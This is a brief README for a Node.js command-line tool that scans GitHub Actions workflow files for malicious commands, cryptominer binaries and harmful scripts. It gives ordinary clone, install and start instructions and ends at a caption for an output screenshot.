Github Actions Security Scanner

A CLI tool to scan github actions (.yml) files for malicious commands, cryptominer binaries and harmful scripts.

Tech Stack

Server: Node.js

Clone the project

  git clone https://github.com/jugal09xx/github-actions-security-scanner

Go to the project directory

Install dependencies

  npm install

Start the server

  npm start

The tool can be tested with different action files by adding them in the src/data directory. Make sure to import the file in app.js as well.

Output screenshot: